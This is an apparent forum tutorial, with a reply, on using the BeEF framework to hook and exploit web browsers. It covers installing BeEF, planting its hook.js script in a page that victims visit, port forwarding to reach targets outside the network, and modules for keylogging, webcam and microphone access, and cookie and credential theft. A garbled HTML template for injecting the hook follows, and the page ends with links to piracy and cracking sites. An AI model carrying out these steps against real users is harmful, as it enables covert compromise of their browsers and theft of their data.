How to Hack Web Browsers Using BeEF Framework 🕶

How to Hack Web Browsers Using BeEF (The Browser Exploitation Framework) :dark_sunglasses:

What is BeEF?

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exportability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

http://beefproject.com/

Now that we know a little about the BeEF project we can start exploiting browsers before we start I will list the required software we will be using.

Installing BeEF

#apt-get update
#apt-get install beef-xss

Requirements

  • Kali Linux or other Linux OS
  • BeEF (The Browser Exploitation Framework)

BeEF comes pre-installed in various pentesting operating systems such as Kali Linux, Parrot OS, BlackArch, Backbox, Cyborg OS in this tutorial I will be using Kali Linux there no difference weather you use Kali Linux or Parrot the tutorial will still take the same steps.

You can find BeEF in Kali Linux applications menu.

“Applications” -> “Kali Linux” -> “System Services” -> “BeEF” -> “beef start.”

Or from a new terminal we can start BeEF’ using the following commands.

cd /usr/share/beef-xss

#./beef


Shows BeEF Framework running on 2 Interfaces Locally. (It does not matter what interface you use as long as your hook Payload is correctly configured).

Accessing BeEF Web GUI

To access BeEF server open up any web browser and access localhost (127.0.0.1). BeEF runs a web server at port 3000. We can access BeEFS Web GUI from the following URL.

http://localhost:3000/ui/authentication

The default credentials for beEF are both “beef” username “beef” and password “beef”.


BeEF Login Web GUI

  • Once you have logged into BeEF Web GUI you can see a section on the left “Hooked Browsers” Online Browsers and Offline Browsers. This section shows victims hooked status.

Forwarding Ports

  • In this tutorial we will be using BeEF inside of our home network using localhost if you intend for users outside the network to connect back to BeEF you will need to open ports within your routers configuration.

www.portforwarding.com

Hooking a Browser

The BeEF hook is a JavaScript file it is used to hook and exploit targets web browsers and acts as a C&C between the target and the attacker. BeEF is an extremely powerful tool and can gather a lot of information about the target. Once BeEF has hooked a target web browser it also allows for additional commands and modules to be executed against the target.

The example below shows a BeEF Hook running on my machines local IP address.

To find you local IP address you can use “ifconfig” from a new terminal.

ifconfig

BeEF hook http://192.168.43.49:3000/hook.js.

  • To successfully attack a browser we will need to add BeEF hook to a Web page that the victim will visit there are many methods of delivering a JavaScript Payload. The easiest way is to include the JavaScript hook in the Head of a web page. After the target visits the compromised web page thier browser will be hooked. You will see the hooked browsers IP address and Operating System Platform hovering over target hooked browser will provide information about the target system we can then click on the hooked browser and gain further information and preform further attacks on the system.

Example of BeEF JavaScript Payload

BeEF Framework also includes some default Web Page templates that you can use.

http://localhost:3000/demos/butcher/index.html

Once the target is presented with the Web Page there browser will be hooked and appear in the Hook Browsers section of the BeEF Web GUI.

  • In the screen shot below we can see BeEF has hooked a target browser and its online from here we can find out information such as The Browsers version plug ins that the browser is using and various information about the target system and its software.

The screen shot below shows Logs from the target system such as mouse movement double clicks and other activity logs created by the target system.

Screen shot below shows available modules that can be used to exploit the target system such as Keyloggers and viewing Webcam’s or Microphone’s of the target browser play sounds steal cookies and credentials and much more.

You might notice that some of the commands have different colored icons next to them. If you click back to the Getting Started tab, it will explain what each of the colors represents.

Each command module has a traffic light icon, which is used to indicate the following:

  • The command module works against the target and should be invisible to the user
  • The command module works against the target, but may be visible to the user
  • The command module is yet to be verified against this target
  • The command module does not work against this target

BeEF also also us to send interactive shell commands to the target system the following screen shot below shows BeEF interactive shell.

BeEF can also be integrated with Metasploit for further system exploitation using modules such as browser_auto_pwn.

Conclusion

JavaScript can be very powerful its always wise to take precautions when visiting various websites. Even if the website is known to be trusted it can still be a threat to Watering Hole attacks.

We hope you enjoyed this tutorial Hack Web Browsers Using BeEF share with friends and check back for more Kali Linux Hacking Tutorials

11 Likes

Beef framework adding custom pages

  • Open a new command terminal enter command “beef-xss”

  • Launch a web browser and enter your local IP address into the search bar.
    You can find your local IP by using ifconfig command.:ifconfig

  • Default Credentials for Beef-XSS Framework
    Username: beef
    Password: beef

  • After you log into Beef-XSS, Open a new terminal and enter the command below. (This command will create a directory to host our templates from).
    mkdir /usr/share/beef-xss/extensions/demos/html/websites

  • Open a text editor , copy and paste basic HTML script below to a new text file. Once you have modified HTML template below save file and name file index.html

    Save file to /usr/share/beef-xss/extensions/demos/html/websites

    <! DOCTYPE html >
    html>
    head>
    title> what ever u want
    var commandModuleStr = ‘” type=”text/javascript”>’ ;
    document.write(commandModuleStr ) ;
    /head>
    body>
    h1> WHAT EVER YOU WANT
    p> anything u want

    /body>
    /html>
  • Restart beef framework by opening a command terminal and using the following command:

    service beef-xss restart

  • In a web browser open up beef framework login.

    Replace 192.168.1.121 with your local IP.

    192.168.1.121:3000/ui/panel

    To check if our hook works, open a new tab in your browser and go to the following URL replace 192.168.X.X with your local IP address.

    http://192.168.X.X:3000/demos/websites/index.html

  • If the target browser has been successfully hooked it will pop up under online browsers in Beef framework.

  • Deploy commands on the target browser as long as the target stays on the hooked URL, but we can also open a new tab to stay connected if u want to hooked browsers outside your local network for that look into port forwarding.

1 Like
Friendly Websites

https://igg-games.com/ https://pcgamestorrents.com/ https://pirateiro.com/ ettvdl.com https://dodi-repacks.site/ https://crackingpatching.com/ https://glodls.to/ https://prostylex.org/ https://haxnode.com/ https://freedownloadae.com/ https://www.novahax.com/ https://www.sadeempc.com/ freecoursesonline.me ftuapps.dev